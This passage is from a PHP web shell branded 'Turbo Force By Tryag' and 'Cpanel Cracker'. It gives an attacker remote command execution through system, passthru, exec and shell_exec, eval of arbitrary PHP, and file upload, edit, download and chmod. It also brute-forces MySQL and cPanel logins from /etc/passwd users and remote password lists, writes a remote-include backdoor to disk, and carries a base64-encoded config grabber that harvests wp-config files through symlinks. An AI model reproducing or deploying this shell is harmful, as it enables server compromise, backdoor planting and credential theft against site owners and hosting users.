 header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); }
 }
 if(isset($_GET['phpinfo'])) 
 {
 echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
 if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query") 
 {
 echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else 
 {
 if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else 
 {
 foreach($querys as $num=>$query) 
 {
 if(strlen($query)>5) 
 {
 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query)) 
 {
 case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result()) 
 {
 echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++) 
 {
 foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; }
 echo "</table>"; }
 break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; }
 }
 }
 }
 }
 echo "<br><title>Turbo Force By Tryag</title><form name=form method=POST>"; 
 echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query'); 
 echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }


function ccmmdd($ccmmdd2,$att)
{
global $ccmmdd2,$att;
echo '
<table style="width: 100%" class="style1" dir="rtl">
	<tr>
		<td class="style9"><strong>Command:</strong></td>
	</tr>
	<tr>
		<td class="style13">
				<form method="post">
					<select name="att" dir="rtl" style="height: 109px" size="6">
';
if($_POST['att']==null)
{
echo '						<option value="system" selected="">system</option>';
}else{
echo "						<option value='$_POST[att]' selected=''>$_POST[att]</option>
						<option value=system>system</option>
";

						
}

echo '
						<option value="passthru">passthru</option>
						<option value="exec">exec</option>
						<option value="shell_exec">shell_exec</option>	
					</select>
						<input name="page" value="ccmmdd" type="hidden"><br>
						<input dir="ltr" name="ccmmdd2" style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}else{echo $_POST['ccmmdd2'];}echo '"><br>
						<input type="submit" value="?????">
				</form>
		
		</td>
	</tr>
	<tr>
		<td class="style13">
';

		if($_POST[att]=='system')
		{
echo '
					<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
					system($_POST['ccmmdd2']);
echo '					</textarea>';


		}

		if($_POST[att]=='passthru')
		{
echo '
					<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
					passthru($_POST['ccmmdd2']);
echo '					</textarea>';


		}

		



		if($_POST[att]=='exec')
		{

echo '					<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
					exec($_POST['ccmmdd2'],$res);
				echo $res = join("\n",$res); 				
echo '					</textarea>';


		}







		if($_POST[att]=='shell_exec')
		{

echo '					<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
				echo	shell_exec($_POST['ccmmdd2']);
echo '					</textarea>';


		}
echo '		
		</td>
	</tr>
</table>
';

exit;
}

if($_POST['page']=='edit')
{

$code=@str_replace("\r\n","\n",$_POST['code']);
$code=@str_replace('\\','',$code);
$fp = fopen($pathclass, 'w');
fwrite($fp,"$code");
fclose($fp);
echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
exit;
}	


	if($_POST['page']=='upload')
	{

if($_FILES['img']['size'] > 0)
{
$path=$_POST['pathclass'];
$name=$_FILES['img']['name'];
if(strpos($path,"\\"))
{
$folder = $path."\\\\".basename($name);
}else{
$folder = $path."/".basename($name) ;
}

move_uploaded_file($_FILES['img']['tmp_name'],$folder);
if(strpos($path,"\\"))
{
echo '<center><b>Yes<br>'."$path\\\\$name";
}else{
echo '<center><b>Yes<br>'."$path/$name";
}


}else{
echo '<center><b>Error :No Enter File';
}

exit;
	}





	if($_POST['page']=='showdir')
	{
	$pathclass =$_POST['pathclass'];
	$pathclass = str_replace('\\\\','\\',$pathclass);

echo '
<form method="POST">
	<input name="pathclass" type="text" style="width: 284px" value="'.$pathclass.'" dir=ltr><input type="submit" value="???">
	<input name="page" type="hidden" value="showdir">
</form>
	
	<br>
';

function format_bytes($bytes) {
   if ($bytes < 1024) return $bytes.' B';
   elseif ($bytes < 1048576) return round($bytes / 1024, 2).' KB';
   elseif ($bytes < 1073741824) return round($bytes / 1048576, 2).' MB';
   elseif ($bytes < 1099511627776) return round($bytes / 1073741824, 2).' GB';
   else return round($bytes / 1099511627776, 2).' TB';
}

	$files1 = scandir($pathclass);

echo '
	<table border="1" width="100%" dir="ltr">
	<tr>
		<td>
		<p align="center"><b><span lang="en-us">name</span></b></td>
		<td>
		<p align="center"><span lang="en-us"><b>size</b></span></td>
		<td>
		<p align="center"><b><span lang="en-us">chmod</span></b></td>
		<td>
		<p align="center"><b><span lang="en-us">read or edit</span></b></td>
		<td>
		<p align="center"><b><span lang="en-us">dowload</span></b></td>
	</tr>
';
	foreach($files1 as $f)
	{
/*	echo "$f<br>";
$f=@filesize($f);
echo format_bytes($f);
*/
$fff="$pathclass$f";
$ff=@filesize($fff);
echo '
	<tr>
		<td>
		<p align="center">'.$f.'</td>
		<td>
		<p align="center">'.format_bytes($ff).'</td>
		<td>

		<p align="center">
';
if($f=='.'||$f=='..')
{
}else{
echo '
<form method="POST" target="_blank">
<p align="center">
<input name="namefile" type="text" value="777" style="width: 45px;">
<input type="submit" value="Change" >
<input name="pathclass" type="hidden" value="'.$fff.'">
<input name="page" type="hidden" value="chmod">        				
</form>
';
}
echo '

		</td>
		<td>';

if($f=='.'||$f=='..')
{
//no
}elseif(strpos($f,".")){
echo '
<form method="POST" target="_blank">
<p align="center">

<input type="submit" value="Edit">
<input name="pathclass" type="hidden" value="'.$fff.'">
<input name="page" type="hidden" value="show">        				
</p>

</form>
';
}

echo '		</td>
		<td>
		';
if($f=='.'||$f=='..')
{
}else{
echo '
<form method="POST" target="_blank">
<p align="center">
<input type="submit" value="Download">
<input name="pathclass" type="hidden" value="'.$fff.'">
<input name="namefile" type="hidden" value="'.$f.'">
<input name="page" type="hidden" value="download">        				
</form>
</p>
';
}

		
echo'		</td>

	</tr>
';

	}

echo '</table>';
exit;
	}

	if($_POST['page']=='code')
	{
	$code=$_POST[code];
	$code=str_replace('\\','',$code);
	eval($code);
	exit;
	}

	if($_POST['page']=='show')
	{
	$pathclass =$_POST['pathclass'];
echo '
<form method="POST">
<input type="hidden" name="page" value="edit">
';
	
	$sahacker = fopen($pathclass, "rb");
echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 845px; height: 404px">';	
$code = fread($sahacker, filesize($pathclass));
echo $code =htmlspecialchars($code);
echo '</textarea>';	
	fclose($sahacker);
echo '
<br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445px;">
<br><strong><input type="submit" value="edit file">
</form>
';
		exit;
	}

	if($_POST['page']=='ccmmdd')
	{
	echo ccmmdd($ccmmdd2,$att);
	exit;
	}

if($_POST['page']=='find')
{
if(isset($_POST['usernames']) && isset($_POST['passwords']))
{
    if($_POST['type'] == 'passwd'){
        $e = explode("\n",$_POST['usernames']);
        foreach($e as $value){
        $k = explode(":",$value);
        $username .= $k['0']." ";
        }
        
        
    }elseif($_POST['type'] == 'simple'){
        $username = str_replace("\n",' ',$_POST['usernames']);
        
        
    }elseif($_POST['type'] == 'file'){
    $username = str_replace("\n",' ',$_POST['usernames']);    
	$namefile=$_POST['namefile'];
	$handle1 = fopen($namefile, "r");
	$_POST['passwords'] = fread($handle1, filesize($namefile));
	fclose($handle1);


    }elseif($_POST['type'] == 'url'){
    $username = str_replace("\n",' ',$_POST['usernames']);
	$ch = curl_init($_POST['namefile2']);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$_POST['passwords'] = curl_exec($ch);
/*
	$contextOptions['http'] = array('method' => 'GET', 'max_redirects'=>0, 'protocol_version'=> 1.0, 'timeout'=>10, 'ignore_errors'=>TRUE);
	$contextResouce  = stream_context_create($contextOptions);
	$url = $_POST['namefile2'];
	$handle = fopen("$url", 'r', false, $contextResouce);
	$_POST['passwords'] = stream_get_contents($handle);
	*/
    }  

    
    $a1 = explode(" ",$username);
    $a2 = explode("\n",$_POST['passwords']);
    $id2 = count($a2);
    $ok = 0;
    foreach($a1 as $user )
    {
        if($user !== '')
        {
        $user=trim($user);
         for($i=0;$i<=$id2;$i++)
         {
            $pass = trim($a2[$i]);
            $server=$_POST['server'];
            if(@mysql_connect("$server","$user","$pass"))
            {
                echo "<b dir=rtl>CrackeD Success With(<b><font color=green>$user</font></b>) PassworD (<b><font color=green>$pass</font></b>)<br />";
                $ok++;
            }
         }
        }
    }
    echo "<hr><b>CrackeD<font color=green>$ok</font>Account</b>";
    echo "<center><b><a href=".$_SERVER['PHP_SELF'].">Back</a>";
    exit;
}
}
?>


<body style="color: #FFFFFF">




<form method="POST" target="_blank">
	<strong>
<input name="page" type="hidden" value="find">        				
    </strong>
    <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
    <tr>
        <td valign="top" bgcolor="#151515"><center><strong><img src="http://www.upload-big.info/upload/7bbc23e8434e69fef6f87e4c58d387e0.gif" /><br>
		</strong>
		<strong>
		<a href="http://tryag.cc" class="style2">Cpanel Cracker</a></strong><br>
    </tr>
    <tr>
    <td>
    <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
	<strong>Users :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames" dir="ltr">root
user1
user2</textarea></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
	<strong>PassworD :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"  dir="ltr">1
12
123
1234
12345
123456
1234567
12345678
123456789
1234567890</textarea></strong></td>
    </tr>
<tr>
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
	<strong>Server :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
    <strong><input name="server" type="text" value="localhost"></strong></td>
    </tr>
    
    <tr>
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
	<strong>Kind Of User And Pass :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" class="style1">
    <span class="style2">
    <input type="radio" name="type" value="simple" checked="checked" class="style1"><b>Default:You Will Use The Default Pass List To Brute<br>
	</b> </span>
	<input type="radio" name="type" value="passwd" class="style1">
    <font class="style2"><b>/etc/passwd Users<br></b> </font>
	<input type="radio" name="type" value="file" class="style1"><span class="style3">
	<font class="style2"><b>Bruting With An IncludeD File At this Path<br>
	<input name="namefile" type="text" value="<?php echo realpath('')?>" style="width: 245px" dir="ltr" ><br>
	<input type="radio" name="type" value="url" class="style1">Bruting From An Uploaded Pass List<br>&nbsp;</b><input dir="ltr" name="namefile2" type="text" value="http://www.ethicalhack3r.co.uk/files/fuzzing/rockyou-75.txt" style="width: 245px" ><br>
	You Can Delete This<br>
	http://www.ethicalhack3r.co.uk/files/fuzzing/phpbb.txt<br>
	http://www.ethicalhack3r.co.uk/files/fuzzing/rockyou-75.txt</font></span></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="StarT Bruting">
    </strong>
    </td>
    <tr>
</form>    
    
    <td valign="top" colspan="6">&nbsp;</td>

<form method="POST" target="_blank">
<strong>
<input type="hidden" name="go" value="cmd_mysql">
    	</strong>
    	<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>MYSQL Manager</strong></td>
    				</tr>
    	<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>User</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text" dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong>PassworD</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text" dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong>Database</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text" dir="ltr"></strong></td>
    				</tr>
					<tr>
    <td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
	<strong>CommanD ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
	<strong>
	<textarea name="db_query" style="width: 353px; height: 89px" dir="ltr">SHOW DATABASES;
SHOW TABLES user_vb ;
SELECT * FROM user;
SELECT version();
SELECT user();</textarea></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="about"></strong></td>
    	</tr>
<input name="db" value="MySQL" type="hidden">
<input name="db_server" type="hidden" value="localhost">
<input name="db_port" type="hidden" value="3306">
<input name="cccc" type="hidden" value="db_query">
    	
</form>    	

    <td valign="top" colspan="6">&nbsp;</td>

<form method="POST" target="_blank">
<strong>
    	</strong>
    	<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Read A File By MYSQL</strong></td>
    				</tr>
    	<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>User</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text" dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong>Pass</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text" dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong>Database Name</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text" dir="ltr"></strong></td>
    				</tr>
					<tr>
    <td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
	<strong>File Path~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
	<strong>
	<input name="pathclass" type="text" style="width: 284px"  dir="ltr" value="<?php echo realpath('')?>"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="ReaD"></strong></td>
    	</tr>
<input type="hidden" name="page" value="read_mysql">    	
</form>    	


    <td valign="top" colspan="6">&nbsp;</td>

<form method="POST" target="_blank">
<strong>
    	</strong>
    	<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Create A File By MYSQL</strong></td>
    				</tr>
    	<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>User</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text" dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong>Pass</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text" dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong>Database Name</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text" dir="ltr"></strong></td>
    				</tr>
					<tr>
    <td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
	<strong>CodE ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
	<strong>
	<textarea name="codes" style="width: 353px; height: 89px" dir="ltr" cols="20" rows="1">&lt;?php include($_GET['u'])?&gt;</textarea><br>
	??? ????? ???? ????<span lang="en-us"> file include </span>????? ??????? ?? 
	?? ???? ???????<br><span lang="en-us">www.site.com/file.php?u=http://shell</span></strong></td>
    			</tr>
					<tr>
    <td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
	<strong>File Path ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
	<strong>
	<input name="pathclass" type="text" style="width: 284px"  dir="ltr" value="<?php echo realpath('')?>/file.php"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="Create"></strong></td>
    	</tr>
<input type="hidden" name="page" value="file_mysql">    	
</form>    	


		<tr>
    
    <td valign="top" colspan="6">&nbsp;</td>

		</tr>
		
<form method="POST" target="_blank">
		<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Command  
	system - passthru - exec - shell_exec</strong></td>
    				</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Commands ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
					<select name="att" dir="rtl"  size="1">
<?php
if($_POST['att']==null)
{
echo '						<option value="system" selected="">system</option>';
}else{
echo "						<option value='$_POST[att]' selected=''>$_POST[att]</option>
						<option value=system>system</option>
";

						
}
?>

						<option value="passthru">passthru</option>
						<option value="exec">exec</option>
						<option value="shell_exec">shell_exec</option>
					</select>    
    <strong>
<input name="page" type="hidden" value="ccmmdd">    
	<input name="ccmmdd2" type="text" style="width: 284px" value="ls -la" dir="ltr"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="Run"></strong></td>
    	</tr>
</form>    	    	

<form method="POST" target="_blank">

		<tr>
    
    <td valign="top" colspan="6">&nbsp;</td>

		</tr>

		<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Managing files and folders</strong></td>
    				</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<strong>
	<input name="pathclass" type="text" style="width: 284px" dir="ltr" value="<?php echo realpath('')?>"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="View"></strong></td>
    				</tr>
<input name="page" type="hidden" value="showdir">        				
</form>    	

<form method="POST" target="_blank">

		<tr>
    
    <td valign="top" colspan="6">&nbsp;</td>

		</tr>

		<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Download A File</strong></td>
    				</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path Of File ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<strong>
	<input name="pathclass" type="text" style="width: 284px"  dir="ltr" value="<?php echo realpath('')?>"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="Download"></strong></td>
    				</tr>
<input name="page" type="hidden" value="download">        				
</form>   

<form method="POST" target="_blank">

		<tr>
    
    <td valign="top" colspan="6">&nbsp;</td>

		</tr>

		<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Edit A File</strong></td>
    				</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>path Of File ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<strong>
	<input name="pathclass" type="text" style="width: 284px" dir="ltr" value="<?php echo realpath('')?>"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="Edit" style="width: 36px"></strong></td>
    				</tr>
<input name="page" type="hidden" value="show">        				
</form>    	

<form method="POST" target="_blank" enctype="multipart/form-data">

		<tr>
    
    <td valign="top" colspan="6">&nbsp;</td>

		</tr>

		<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Upload A File</strong></td>
    				</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>File ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<input name="img" type="file"></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<strong>
	<input name="pathclass" type="text" style="width: 284px" dir="ltr" value="<?php echo realpath('')?>"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="Upload"></strong></td>
    				</tr>
<input name="page" type="hidden" value="upload">        				
</form>    				


<form method="POST" target="_blank">

		<tr>
    
    <td valign="top" colspan="6">&nbsp;</td>

		</tr>

		<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Excute PHP</strong></td>
    				</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Code ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<strong>
	<textarea name="code" dir="ltr" style="width: 353px; height: 89px">echo '<center><b>PHP Working</b></center>';
#readfile('/etc/passwd');
</textarea>
</strong>
</td>
</tr>
<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
<input type="submit" value="RUN" style="height: 26px"></strong></td>
</tr>
<input name="page" type="hidden" value="code">
</form>    	

    <p align="center"></td>
  </tr><div align="center">

                <tr>
</table>
</td>
</tr>
</table>';$file = fopen("cpn.php" ,"w+");$write = fwrite ($file ,base64_decode($crackftp));fclose($file); echo " ";}elseif ($action == 's4config') {@chdir('damane');$local_exp = 'PGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5TZWM0RXZlciBDb25maWcgR3JhYmJlciBCeSBEYW1hbmUyMDExPC90aXRsZT4NCjxsaW5rIGhyZWY9J2h0dHA6Ly93d3cuc2VjNGV2ZXIuY29tL2hvbWUvc2VjNGV2ZXIuZ2lmJyB0eXBlPSdpbWFnZS94LWljb24nIHJlbD0nc2hvcnRjdXQgaWNvbicgLz4NCjxzdHlsZT4NCmJvZHl7YmFja2dyb3VuZC1jb2xvcjojMTExO2NvbG9yOiMwMGZmMDA7fQ0KYm9keSx0ZCx0aHsgZm9udDogOHB0IEx1Y2lkYSxUYWhvbWE7bWFyZ2luOjA7dmVydGljYWwtYWxpZ246dG9wO2NvbG9yOiMwMGZmMDA7IH0NCnRhYmxlLmluZm97IGNvbG9yOiMwMDA7YmFja2dyb3VuZC1jb2xvcjojMjIyOyB9DQp0ZXh0LWFsaWduOiBjZW50ZXI7DQpzcGFuLGgxLGF7IGNvbG9yOiAkY29sb3IgIWltcG9ydGFudDsgfQ0Kc3BhbnsgZm9udC13ZWlnaHQ6IGJvbGRlcjsgfQ0KaDF7IGJvcmRlci1sZWZ0OjdweCBzb2xpZCAkY29sb3I7cGFkZGluZzogM3B4IDVweDtmb250OiAxNHB0IFZlcmRhbmE7YmFja2dyb3VuZC1jb2xvcjojMzMzO21hcmdpbjowcHg7IH0NCmRpdi5jb250ZW50eyBwYWRkaW5nOiA1cHg7bWFyZ2luLWxlZnQ6NXB4O2JhY2tncm91bmQtY29sb3I6IzIyMjsgfQ0KYXsgdGV4dC1kZWNvcmF0aW9uOm5vbmU7IH0NCmE6aG92ZXJ7IHRleHQtZGVjb3JhdGlvbjp1bmRlcmxpbmU7IH0NCi5tbDF7IGJvcmRlcjoxcHggc29saWQgIzU1NTtwYWRkaW5nOjVweDttYXJnaW46MDtvdmVyZmxvdzogYXV0bzsgfQ0KLmJpZ2FyZWF7IHdpZHRoOjEwMCU7aGVpZ2h0OjMwMHB4OyB9DQojbmV3LGlucHV0LHRhYmxlLHRkLHRyLCNnZ3tib3JkZXItc3R5bGU6c29saWQ7dGV4dC1kZWNvcmF0aW9uOmJvbGQ7fQ0KaW5wdXQsdGV4dGFyZWEsc2VsZWN0eyBtYXJnaW46MDtjb2xvcjojOTk5O2JhY2tncm91bmQtY29sb3I6IzIyMjtib3JkZXI6MXB4IHNvbGlkICRjb2xvcjsgZm9udDogOHB0IFRhaG9tYSwiVGFob21hIjsgfQ0KLnN0eWxlew0KICAgIGZvbnQtc2l6ZTogMzZweDsNCgl0ZXh0LWFsaWduOiBjZW50ZXI7DQogICAgY29sb3I6ICNGRkZGRkY7DQogICAgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsNCiAgICBmb250LWZhbWlseTogR2VvcmdpYSwgIlRpbWVzIE5ldyBSb21hbiIsIFRpbWVzLCBzZXJpZjsNCn0NCiN0ZXh0YXJlYSB7DQogYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsNCiAtbW96LWJvcmRlci1yYWRpdXM6IDE1cHg7DQogLXdlYmtpdC1ib3JkZXItcmFkaXVzOiAxNXB4Ow0KIGJvcmRlcjogMXB4IHNvbGlkICNGRjAwMDA7DQogcGFkZGluZzogNXB4OyBjb2xvcjojRkYwMDAwDQp9DQo8L3N0eWxlPg0KPGRpdiBhbGlnbj0iY2VudGVyIiBjbGFzcz0ic3R5bGUiPlNlYzRFdmVyIENvbmZpZyBHcmFiYmVyIEJ5IERhbWFuZTIwMTEgKFBIUCBWZXJzaW9uKTwvZGl2Pg0KPHA+Jm5ic3A7PC9wPg0KPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+DQo8cCBhbGlnbj0iY2VudGVyIj4NCjxmb250IHNpemU9IjUiPkNvbmZpZ3MgUGF0aDo8L2ZvbnQ+DQo8cD4mbmJzcDs8L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48dGV4dGFyZWEgaWQ9InRleHRhcmVhIiBuYW1lPSJjb25maWdzIiBjb2xzPSIxMDAiIHJvd3M9IjE4IiA+L2Jsb2cvd3AtY29uZmlnLnBocDwvdGV4dGFyZWE+DQo8cD4mbmJzcDs8L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48Zm9udCBzaXplPSI1Ij5Ib21lIFBhdGg6PC9mb250Pg0KPHA+Jm5ic3A7PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+PGlucHV0IG5hbWU9ImhvbWUiIHR5cGU9InRleHQiIHNpemU9IjMwIiB2YWx1ZT0iL2hvbWUiLz48YnI+DQo8cD4mbmJzcDs8L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48Zm9udCBzaXplPSI1Ij5GaWxlcyBQYXRoOjwvZm9udD4NCjxwPiZuYnNwOzwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxpbnB1dCBuYW1lPSJwdWJsaWMiIHR5cGU9InRleHQiIHNpemU9IjMwIiB2YWx1ZT0iL3B1YmxpY19odG1sIi8+PGJyPg0KPHA+Jm5ic3A7PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+PGlucHV0IG5hbWU9InN5bWxpbmsiIHNpemU9IjgwIiB2YWx1ZT0iU3ltbGluayIgdHlwZT0ic3VibWl0Ij4NCjxwPiZuYnNwOzwvcD4NCjwvZm9ybT4NCjw/DQovKg0KDQpGaWxlIFdyaXRlZCBCeSBEYW1hbmUyMDExDQoNCkVtYWlsOiBEYW1hbmUtRHpAaG90bWFpbC5jb20NCg0KVHdpdHRlcjogQERhbWFuZUR6DQoNCkJlZm9yZSBVc2luZyBUaGlzIEZpbGUgUGxlYXNlIENoZWNrIFRoZSBEaXNhYmxlZCBGdW5jdGlvbiANCg0KWW91IENhbiBVc2UgVGhpcyBGaWxlIFRvIENoZWNrIFRoZW0NCg0KaHR0cDovL3Bhc3RlYmluLmNvbS9Cc1RuQmpRag0KDQpQLlM6IFN5bWxpbmsgRnVuY3Rpb24gSXMgVmVyeSBSZXF1ZXN0ZWQNCg0KVGhlIEJlbG93IENvbW1lbnRzIFdhcyBDcmVhdGVkIEp1c3QgdG8gSGVscCBCZWdpbm5lcg0KDQoqLw0KDQpzZXRfdGltZV9saW1pdCgwKTsgLy8gbm8gdGltZSBsaW1pdA0KDQppZihpc3NldCgkX